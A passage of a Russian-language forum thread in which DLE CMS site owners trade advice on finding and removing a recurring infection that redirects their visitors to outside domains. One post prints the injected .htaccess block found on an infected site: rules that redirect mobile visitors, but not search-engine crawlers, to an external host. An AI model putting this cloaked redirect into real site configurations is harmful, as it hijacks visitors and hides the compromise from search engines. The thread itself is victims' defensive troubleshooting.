Вирус на сайте cms dle

HUTUR
На сайте с 07.06.2010
Offline
101
#501

На трех сайтах обнаружил редиректы:

1 сайт googlanalytics.ws

2 сайт opgrade.ws

3 сайт dll-opera.ws

До этого на всех сайтах удалял такую фигню о которой говорится в ветке, но сейчас проходя по всем папкам .htaccess index.php и т.д. ничего не могу найти. Где это засело хз, поставил заглушки чтобы не подгружалось с аватарок. Может кто подскажет в где это искать?

M
На сайте с 17.05.2010
Offline
60
#502
HUTUR:
На трех сайтах обнаружил редиректы:
1 сайт googlanalytics.ws
2 сайт opgrade.ws
3 сайт dll-opera.ws

До этого на всех сайтах удалял такую фигню о которой говорится в ветке, но сейчас проходя по всем папкам .htaccess index.php и т.д. ничего не могу найти. Где это засело хз, поставил заглушки чтобы не подгружалось с аватарок. Может кто подскажет в где это искать?

проверьте еще inc.php, init.php, search.php. мНЕ В эти файлы писали.

Поставьте ZEOS, меня он спасает просто. Поставила проверку файлов на изменения каждые 10 минут с уведомлением на электронку, кот. снимает смартфон.

ZEOS покажет какие файлы поменяли.

Скоро буду обновляться начистую до 9.8. Может хоть так удасться избавится от моего милого хакера. Патчи не помогают.

Michel700
На сайте с 31.01.2013
Offline
49
#503
HUTUR:
На трех сайтах обнаружил редиректы:
1 сайт googlanalytics.ws
2 сайт opgrade.ws
3 сайт dll-opera.ws

До этого на всех сайтах удалял такую фигню о которой говорится в ветке, но сейчас проходя по всем папкам .htaccess index.php и т.д. ничего не могу найти. Где это засело хз, поставил заглушки чтобы не подгружалось с аватарок. Может кто подскажет в где это искать?

Ставьте 9.8, пока бог милует. Админку смените.

Всё будет гуд!!!
HUTUR
На сайте с 07.06.2010
Offline
101
#504
mayavt:
проверьте еще inc.php, init.php, search.php. мНЕ В эти файлы писали.
Поставьте ZEOS, меня он спасает просто. Поставила проверку файлов на изменения каждые 10 минут с уведомлением на электронку, кот. снимает смартфон.
ZEOS покажет какие файлы поменяли.

Скоро буду обновляться начистую до 9.8. Может хоть так удасться избавится от моего милого хакера. Патчи не помогают.

Спасибо, inc.php, init.php, search.php проверял не по одному разу. Эта зараза, где-то в другом месте засела.

DL
На сайте с 20.05.2013
Offline
0
#505

3-й раз выдераю этот вирус ищите тут

config.php

dbconfig.php

engine.php - 2 раза прописан

init.php

index.php

и проверьте .htaccess там лишний код в области упоминания tags

Удачи!

A0
На сайте с 17.04.2013
Offline
31
#506

От редиректа я избавился наверно с месяц назад, но яшка после этого как на прокаженного смотрит, хостов так на 25k скинул и возвращать позиции сайта я так понял не собирается, у кого нибудь такая ситуация с падением посещаемости присутствует после заражения сайта?

Web-lomaster
На сайте с 26.08.2012
Offline
107
#507

Тоже сегодня снова такая проблема вылезла. С месяц назад от всех кодов избавился, поменял все пароли, переименовал админки и все стало тихо, жил спокойно. Сегодня захожу и опять эта дрянь. Причем еще в новость iframe блок вставил, именно его антивирус спалил и поэтому так быстро все вычистил.

Еще ищите код в файле /language/Russian/website.lng в самом конце.

PS Кто возьмется найти эту дырку, стукните в ЛС плиз. По цене договоримся.

✔ Белая монетизация вашего трафика оффер Медиагет (http://goo.gl/dYsuIP) 3.5 руб за установку. Никаких пряток, санкций и фильтров!
Glam
На сайте с 11.08.2009
Offline
119
#508

Пропатченная DLE 9.6

постоянно в корневом .htaccess появляется вот такая херня. Даже если ставлю права 0444, все равно появляется эта ерунда и права становятся 0664

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (symbos|windows\ mobile|smartphone|blackberry|ppc|midp|windows\ ce|mtk|j2me|symbian|series\ 60|android) [NC]
RewriteCond %{HTTP_USER_AGENT} !(ask\ jeeves|gamespy|googlebot|baidu|slurp|worldindexer|yandexaddurl|yandexnews|jigsaw|yandexmetrika|antabot|mmcrawler|gsa-crawler|yandexdirect|webalta|feedfetcher|yandexblogs|yandeximageresizer|accoona|yandexbot|yahoofeedseeker|grub-client|yandexmedia|ia_archiver|yandexvideo|yandexcatalog|gigabot|eltaindexer|gulper|mihalism|msnbot|ooyyo|pagebull|scooter|w3c_validator|yandeximages|yandexfavicons) [NC]
RewriteRule (.*) http://hy.gy/ [L,R=302]
siv1987
На сайте с 02.04.2009
Offline
427
#509

Поменяйте права на запись этой папки где находиться htaccess и найдите шелл через который вам изменяют код.

D8
На сайте с 16.06.2007
Offline
74
dm8
#510

старо..

заметил. если интересует - повреждения глубокие, - меняйте весь движок, - база не затронута в этот раз.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий